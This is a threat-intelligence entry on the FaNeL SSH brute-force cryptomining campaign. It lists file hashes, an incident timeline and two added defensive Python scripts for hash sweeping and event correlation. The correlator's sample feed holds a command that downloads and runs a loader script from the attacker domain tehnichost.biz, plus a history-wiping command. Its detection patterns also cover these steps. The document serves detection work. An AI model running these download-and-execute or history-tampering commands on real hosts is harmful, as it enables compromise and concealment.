Botnet Encyclopedia

A Knowledge Base of Attack Campaigns captured by Guardicore Global Sensor Network

Campaign Information

Name: FaNeL

Status: active

First seen in Guardicore Centra: 2019-06-14

Last seen in Guardicore Centra: 2020-08-03

Seen in GGSN since the end of 2019, the FaNeL cryptomining campaign appears to be operated by an individual hacker based in Romania. FaNeL compromises machines by brute-forcing their SSH service, downloads various scripts that inventory the available resources (CPU, memory and disk space) and runs an XMRig cryptominer. FaNeL's attack tools are made available to other attack groups and hacking amateurs: ASN prefixes, password lists and speed-testing scripts, to name a few. Some of the attacks captured by Guardicore are tagged as 'Human', implying that the hacker is still testing and evaluating the attack flow and its efficiency.


Indicators of Compromise

Associated Files

Path | Hash | Size
/cybernetik.3x.ro/screen, /h4e/screen, /h4ex/screen.filepart… | 2413af510a75ada34716165992a425b35f62ba1478f63746502afd8a8a156b80 | 244.12 KB
/home/mysql/a, /home/mysql/v.py, /home/mysql/v.py.1… | 00e430b733cf199747c9c6e0f2e2fae6a045bbed9c0f0f993112b301fcdf5dbc | 24.87 KB
/home/mysql/groot/1, /root/1, /root/.bad-gosh/1… | 246fcc88606c73771e9ccfed22be1ee97636f65156b1076db2e506e16e732db3 | 189 bytes
/home/mysql/groot/2, /root/2, /root/.bad-gosh/2… | 42237dd0eeacbddd1e07df21cd437cdf9c1b0282ac7b565d51589e57b39bffd1 | 119 bytes
/home/mysql/groot/random, /root/.bad-gosh/random, /root/bad-gosh/random… | 6d8ffb2449a2e56d63c23e66aa367bd3a610adf96b288dfc8e52bffda15751af | 184 bytes
/home/mysql/groot/3, /root/claiugosh/3, /root/cleangosh/3… | c2c5e4a271f8af56df3c091397e9db498f48434001e3d8b7e63cadd902e5adc9 | 187 bytes
/home/mysql/ninfo, /root/Nasa/ninfo, /root/ninfo… | 19778a62055770a9e5f890e52227ccd39251bf23045c15383411638540ceabf7 | 2.87 KB
/home/mysql/groot/go, /root/gosh/go, /.sal/groot/go… | 41c3ee93f8d79479d09ab1771be47ef4eac2a0829fc2d4f2d97320de509b9b84 | 815 bytes
/home/mysql/groot/anti-blackdor.anti, /root/gosh/anti-blackdor.anti, /var/tmp/gosh/anti-blackdor.anti | ff2d1dfec0d7f40d0045942cceda733184cbaf57fcf3e251c2e52b231ec4cefe | 12.48 KB
/root/info | 47f50a575dd6d3d835c52e324cacaef0d5f59f720c74fb2309698aed65d0e155 | 5.34 KB
/root/info | 41bf5114307e1587974d3b36f4c5e71e46192027c67ccf51e0d5ddfcd3239251 | 5.36 KB
/root/gosh.zip.filepart | 7e93262fc0b605814727a9b8a9d3b3b591e6ddf5cbb61189ee8831478edd436a | 142.02 KB
/root/ozn.zip | a7814dc8c8533fe436ea0b9840212ae3878840c5ceff16c5762a4a599adaf83c | 1011.85 KB
/root/v.py | 27d6db7b554a79bf65373090fb91d2255b259374b520b239040a19f65a6fdbd0 | 48.52 KB
/root/v.py | c3c7ddd7069aeaf4213a593e8f142410cc39ac7c337171fb1f3c5eafccea6043 | 48.52 KB

Note that /root/info and /root/v.py each appear twice with different hashes: the operator shipped more than one version of the same tool, so a sweep should match on the full hash set rather than on the latest sample only.
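The table above is only useful if it can be turned into a sweep. The script below is an added example, not Guardicore's tooling: it walks the directories the campaign was seen to use, flags files by the drop names and staging directories in the table, and hashes every file it sees against the listed digests. It assumes the 64-hex digests are SHA-256 (the digest Guardicore publishes); if they were another 256-bit hash the hash check would simply never fire and the path checks would still apply. The demo layout at the bottom is constructed, and the files it creates are placeholders rather than the campaign's scripts.

```python
#!/usr/bin/env python3
"""Sweep a host for FaNeL artifacts by path and by file hash (added example).

Assumes the encyclopedia digests are SHA-256. The demo() layout is constructed
and its file contents are placeholders, not the campaign's own scripts.
"""
import hashlib
import os
import tempfile

# Digests copied from the Associated Files table.
FANEL_HASHES = {
    "2413af510a75ada34716165992a425b35f62ba1478f63746502afd8a8a156b80",
    "00e430b733cf199747c9c6e0f2e2fae6a045bbed9c0f0f993112b301fcdf5dbc",
    "246fcc88606c73771e9ccfed22be1ee97636f65156b1076db2e506e16e732db3",
    "42237dd0eeacbddd1e07df21cd437cdf9c1b0282ac7b565d51589e57b39bffd1",
    "6d8ffb2449a2e56d63c23e66aa367bd3a610adf96b288dfc8e52bffda15751af",
    "c2c5e4a271f8af56df3c091397e9db498f48434001e3d8b7e63cadd902e5adc9",
    "19778a62055770a9e5f890e52227ccd39251bf23045c15383411638540ceabf7",
    "41c3ee93f8d79479d09ab1771be47ef4eac2a0829fc2d4f2d97320de509b9b84",
    "ff2d1dfec0d7f40d0045942cceda733184cbaf57fcf3e251c2e52b231ec4cefe",
    "47f50a575dd6d3d835c52e324cacaef0d5f59f720c74fb2309698aed65d0e155",
    "41bf5114307e1587974d3b36f4c5e71e46192027c67ccf51e0d5ddfcd3239251",
    "7e93262fc0b605814727a9b8a9d3b3b591e6ddf5cbb61189ee8831478edd436a",
    "a7814dc8c8533fe436ea0b9840212ae3878840c5ceff16c5762a4a599adaf83c",
    "27d6db7b554a79bf65373090fb91d2255b259374b520b239040a19f65a6fdbd0",
    "c3c7ddd7069aeaf4213a593e8f142410cc39ac7c337171fb1f3c5eafccea6043",
}
# Names taken from the table's paths. "info", "ninfo" and the numeric scripts are
# too generic to flag alone, so they only count via the staging-directory check.
DROPPER_NAMES = {"v.py", "anti-blackdor.anti", "gosh.zip.filepart", "ozn.zip", "screen.filepart"}
STAGING_DIRS = {".bad-gosh", "bad-gosh", "gosh", "groot", "cleangosh", "claiugosh",
                "Nasa", ".sal", "h4e", "h4ex"}


def sha256_file(path, chunk=1 << 16):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def is_ioc_hash(digest):
    return digest.lower() in FANEL_HASHES


def hunt(roots):
    """Walk roots and return (path, sha256, reason) for every suspicious file."""
    findings = []
    for root in roots:
        for dirpath, _, filenames in os.walk(root):
            in_staging = bool(set(dirpath.split(os.sep)) & STAGING_DIRS)
            for name in filenames:
                full = os.path.join(dirpath, name)
                if os.path.islink(full) or not os.path.isfile(full):
                    continue  # skip symlinks and special files
                reasons = []
                if name in DROPPER_NAMES:
                    reasons.append("known dropper filename")
                if in_staging:
                    reasons.append("inside a known staging directory")
                try:
                    digest = sha256_file(full)
                except OSError:
                    continue  # unreadable or vanished: move on
                if is_ioc_hash(digest):
                    reasons.append("hash matches campaign IoC")
                if reasons:
                    findings.append((full, digest, "; ".join(reasons)))
    return findings


def demo():
    """Constructed layout mimicking the campaign's drop locations; placeholder contents."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "root", ".bad-gosh"))
        for rel, body in [("root/.bad-gosh/1", "#!/bin/bash\necho placeholder\n"),
                          ("root/v.py", "print('placeholder')\n"),
                          ("root/notes.txt", "benign\n")]:
            with open(os.path.join(tmp, rel), "w") as f:
                f.write(body)
        return sorted((os.path.relpath(p, tmp), d, why) for p, d, why in hunt([tmp]))


if __name__ == "__main__":
    import sys
    # Default roots are the locations the table and incident summary report.
    for path, digest, why in hunt(sys.argv[1:] or ["/root", "/home", "/tmp", "/var/tmp"]):
        print(f"{path}\t{digest}\t{why}")
```

Run it as root so /root and /home are readable; a hit on "inside a known staging directory" alone is a lead to inspect, while a hash match is a confirmed sample and should go straight to containment.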

Attack Flow

Breached Services: SSH

Tags: Shell Commands, Log Tampering, HTTP, SSH, Download and Execute, SSH Brute Force, Outgoing Connection, Access Suspicious Domain, Successful SSH Login, Download Operation, Download and Allow Execution, Download File

Incident Summary

A user logged in using SSH with the following credentials: root / **** – Authentication policy: White List (Part of a Brute Force Attempt) [Successful SSH Login, SSH Brute Force]

A possibly malicious Download Operation was detected 2 times [Download Operation]

History File Tampering detected from /bin/bash [Log Tampering]

Process /bin/bash generated outgoing network traffic to: 93.114.82.21:80 [Outgoing Connection]

Process /bin/bash attempted to access suspicious domains: tehnichost.biz [Outgoing Connection, Access Suspicious Domain]

The file /tmp/nitebins.sh was downloaded and granted execution privileges

Process /usr/bin/wget generated outgoing network traffic to: 93.114.82.21:80 [Outgoing Connection]

Process /usr/bin/wget attempted to access suspicious domains: tehnichost.biz [Outgoing Connection, Access Suspicious Domain]

/tmp/mips was downloaded [Download File]

The file /tmp/mips was downloaded and granted execution privileges

Process /usr/bin/wget generated outgoing network traffic to: 93.114.82.21:80 3 times [Outgoing Connection]

Process /usr/bin/wget attempted to access suspicious domains: tehnichost.biz 3 times [Outgoing Connection, Access Suspicious Domain]

/tmp/mipsel was downloaded [Download File]

The file /tmp/mipsel was downloaded and granted execution privileges

Process /usr/local/bin/dash generated outgoing network traffic to: 93.114.82.21:80 [Outgoing Connection]

Process /usr/local/bin/dash attempted to access suspicious domains: tehnichost.biz [Outgoing Connection, Access Suspicious Domain]

The file /tmp/sh4 was downloaded and granted execution privileges

The file /tmp/x86 was downloaded and executed [Download and Execute]

/tmp/armv6l was downloaded [Download File]

The file /tmp/armv6l was downloaded and granted execution privileges

Process /usr/bin/wget generated outgoing network traffic to: 93.114.82.21:80 4 times [Outgoing Connection]

Process /usr/bin/wget attempted to access suspicious domains: tehnichost.biz 4 times [Outgoing Connection, Access Suspicious Domain]

The file /tmp/i686 was downloaded and executed 2 times [Download and Execute]

/tmp/powerpc was downloaded [Download File]

The file /tmp/powerpc was downloaded and granted execution privileges

Process /usr/bin/wget generated outgoing network traffic to: 93.114.82.21:80 [Outgoing Connection]

Process /usr/bin/wget attempted to access suspicious domains: tehnichost.biz [Outgoing Connection, Access Suspicious Domain]

The file /tmp/i586 was downloaded and executed [Download and Execute]

Process /usr/local/bin/dash generated outgoing network traffic to: 93.114.82.21:80 2 times [Outgoing Connection]

Process /usr/local/bin/dash attempted to access suspicious domains: tehnichost.biz 2 times [Outgoing Connection, Access Suspicious Domain]

The file /tmp/m68k was downloaded and granted execution privileges

The file /tmp/sparc was downloaded and granted execution privileges

/tmp/armv4l was downloaded [Download File]

The file /tmp/armv4l was downloaded and granted execution privileges

/tmp/armv5l was downloaded [Download File]

The file /tmp/armv5l was downloaded and granted execution privileges

Process /bin/bash generated outgoing network traffic to: 107.187.122.10:80 [Outgoing Connection]

Process /bin/bash attempted to access suspicious domains: 107.in-addr.arpa [Outgoing Connection, Access Suspicious Domain] (in-addr.arpa is the reverse-DNS zone, so this is a PTR lookup on the 107.x address rather than a domain the attacker contacted)

/tmp/bot.pl was downloaded [Download File]

Process /usr/bin/perl generated outgoing network traffic to: 45.55.150.239:6667 [Outgoing Connection]

Connection was closed due to timeout

Read end to end, the captured incident is: a brute-forced root SSH login, immediate shell-history tampering, a loader script (nitebins.sh, fetched from tehnichost.biz at 93.114.82.21) that pulls one binary per architecture into /tmp and marks each executable, a second download (bot.pl) from 107.187.122.10, and finally perl connecting out to 45.55.150.239 on TCP/6667, the standard IRC port. Only the x86, i686 and i586 payloads were actually executed, which is what the loader's try-every-architecture approach looks like on a single host.
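Each line of the summary is an isolated sensor alert; what makes the incident recognisable is the sequence. The script below is an added example, not Guardicore's detection logic: it correlates a constructed host event feed into the five stages the summary shows (brute force followed by a successful login, history tampering, download-then-chmod in one command line, a loader dropping several architectures into /tmp, and an interpreter dialling an IRC port). The line format, the thresholds and the feed itself are constructed; the domain, download host, IRC destination and /tmp file names are the ones reported above, while 198.51.100.7 and 203.0.113.5 are documentation addresses standing in for the SSH source and a benign destination, neither of which the page gives.

```python
#!/usr/bin/env python3
"""Correlate host events into the FaNeL chain from the incident summary (added example).

Event format, thresholds and the SAMPLE_EVENTS feed are constructed for this
example; 198.51.100.7 / 203.0.113.5 are placeholder documentation addresses.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

BRUTE_FORCE_FAILS = 5                      # assumed threshold, tune per environment
BRUTE_FORCE_WINDOW = timedelta(minutes=10)
# Architectures the loader iterated over in the incident summary.
ARCH_NAMES = {"mips", "mipsel", "sh4", "x86", "armv6l", "i686", "powerpc",
              "i586", "m68k", "sparc", "armv4l", "armv5l"}
IRC_PORTS = {6667, 6668, 6669, 6697}       # standard IRC ports; 6667 is what bot.pl used
INTERPRETERS = {"perl", "python", "python3", "bash", "sh", "dash"}

AUTH_RE = re.compile(r"(Failed|Accepted) password for (\S+) from (\S+) port \d+")
HISTORY_TAMPER_RE = re.compile(r"HISTFILE=/dev/null|unset\s+HISTFILE|history\s+-c|\.bash_history")
DROP_AND_CHMOD_RE = re.compile(r"\b(wget|curl)\b.*\bchmod\s+(\+x|[0-7]{3,4})")
FILE_RE = re.compile(r"(/tmp/\S+) downloaded(?: (chmod \+x|executed))?")
NET_RE = re.compile(r"(\S+) -> (\S+):(\d+)")

# Constructed feed: "<ISO timestamp> <kind> <payload>", in the order the summary reports.
SAMPLE_EVENTS = """\
2020-08-03T10:00:01 auth Failed password for root from 198.51.100.7 port 51000 ssh2
2020-08-03T10:00:02 auth Failed password for root from 198.51.100.7 port 51001 ssh2
2020-08-03T10:00:03 auth Failed password for root from 198.51.100.7 port 51002 ssh2
2020-08-03T10:00:04 auth Failed password for root from 198.51.100.7 port 51003 ssh2
2020-08-03T10:00:05 auth Failed password for root from 198.51.100.7 port 51004 ssh2
2020-08-03T10:00:07 auth Accepted password for root from 198.51.100.7 port 51006 ssh2
2020-08-03T10:00:09 cmd /bin/bash unset HISTFILE; export HISTFILE=/dev/null
2020-08-03T10:00:10 cmd /bin/bash cd /tmp; wget http://tehnichost.biz/nitebins.sh; chmod +x nitebins.sh; sh nitebins.sh
2020-08-03T10:00:12 net /usr/bin/wget -> 93.114.82.21:80
2020-08-03T10:00:13 file /tmp/mips downloaded chmod +x
2020-08-03T10:00:14 file /tmp/armv6l downloaded
2020-08-03T10:00:15 file /tmp/mipsel downloaded chmod +x
2020-08-03T10:00:16 file /tmp/x86 downloaded executed
2020-08-03T10:00:20 net /usr/bin/perl -> 45.55.150.239:6667
2020-08-03T10:00:21 net /usr/bin/curl -> 203.0.113.5:443
"""


def parse_event(line):
    ts, kind, payload = line.split(" ", 2)
    return datetime.fromisoformat(ts), kind, payload


def correlate(lines):
    """Return (timestamp, rule, detail) findings in the order the chain unfolds."""
    findings = []
    failures = defaultdict(deque)   # source IP -> timestamps of recent failed logins
    dropped_archs = {}              # arch name -> first time it was made executable or run
    for line in lines:
        if not line.strip():
            continue
        ts, kind, payload = parse_event(line)
        if kind == "auth":
            m = AUTH_RE.search(payload)
            if not m:
                continue
            outcome, user, src = m.groups()
            recent = failures[src]
            while recent and ts - recent[0] > BRUTE_FORCE_WINDOW:
                recent.popleft()    # forget failures outside the window
            if outcome == "Failed":
                recent.append(ts)
            elif len(recent) >= BRUTE_FORCE_FAILS:
                findings.append((ts, "ssh_brute_force_success",
                                 f"{user} from {src} after {len(recent)} failures"))
        elif kind == "cmd":
            _, _, cmdline = payload.partition(" ")   # strip the process path
            if HISTORY_TAMPER_RE.search(cmdline):
                findings.append((ts, "history_tampering", cmdline))
            if DROP_AND_CHMOD_RE.search(cmdline):
                findings.append((ts, "download_and_allow_execution", cmdline))
        elif kind == "file":
            m = FILE_RE.search(payload)
            if not m or not m.group(2):
                continue            # plain download with no chmod/exec yet: keep watching
            name = m.group(1).rsplit("/", 1)[-1]
            if name in ARCH_NAMES:
                dropped_archs.setdefault(name, ts)
                if len(dropped_archs) == 3:   # fire once, on the third distinct architecture
                    findings.append((ts, "multi_arch_loader", ",".join(sorted(dropped_archs))))
        elif kind == "net":
            m = NET_RE.search(payload)
            if not m:
                continue
            proc, dst, port = m.groups()
            if int(port) in IRC_PORTS and proc.rsplit("/", 1)[-1] in INTERPRETERS:
                findings.append((ts, "irc_c2_from_interpreter", f"{proc} -> {dst}:{port}"))
    return findings


def demo():
    return correlate(SAMPLE_EVENTS.splitlines())


if __name__ == "__main__":
    for ts, rule, detail in demo():
        print(f"{ts.isoformat()}  {rule:<30} {detail}")
```

The multi-architecture rule deliberately waits for the third distinct architecture rather than firing on the first /tmp binary, since a single chmod in /tmp is routine on build hosts; the IRC rule keys on the interpreter rather than the port alone, because bot.pl running under /usr/bin/perl is the shape of this campaign's beacon.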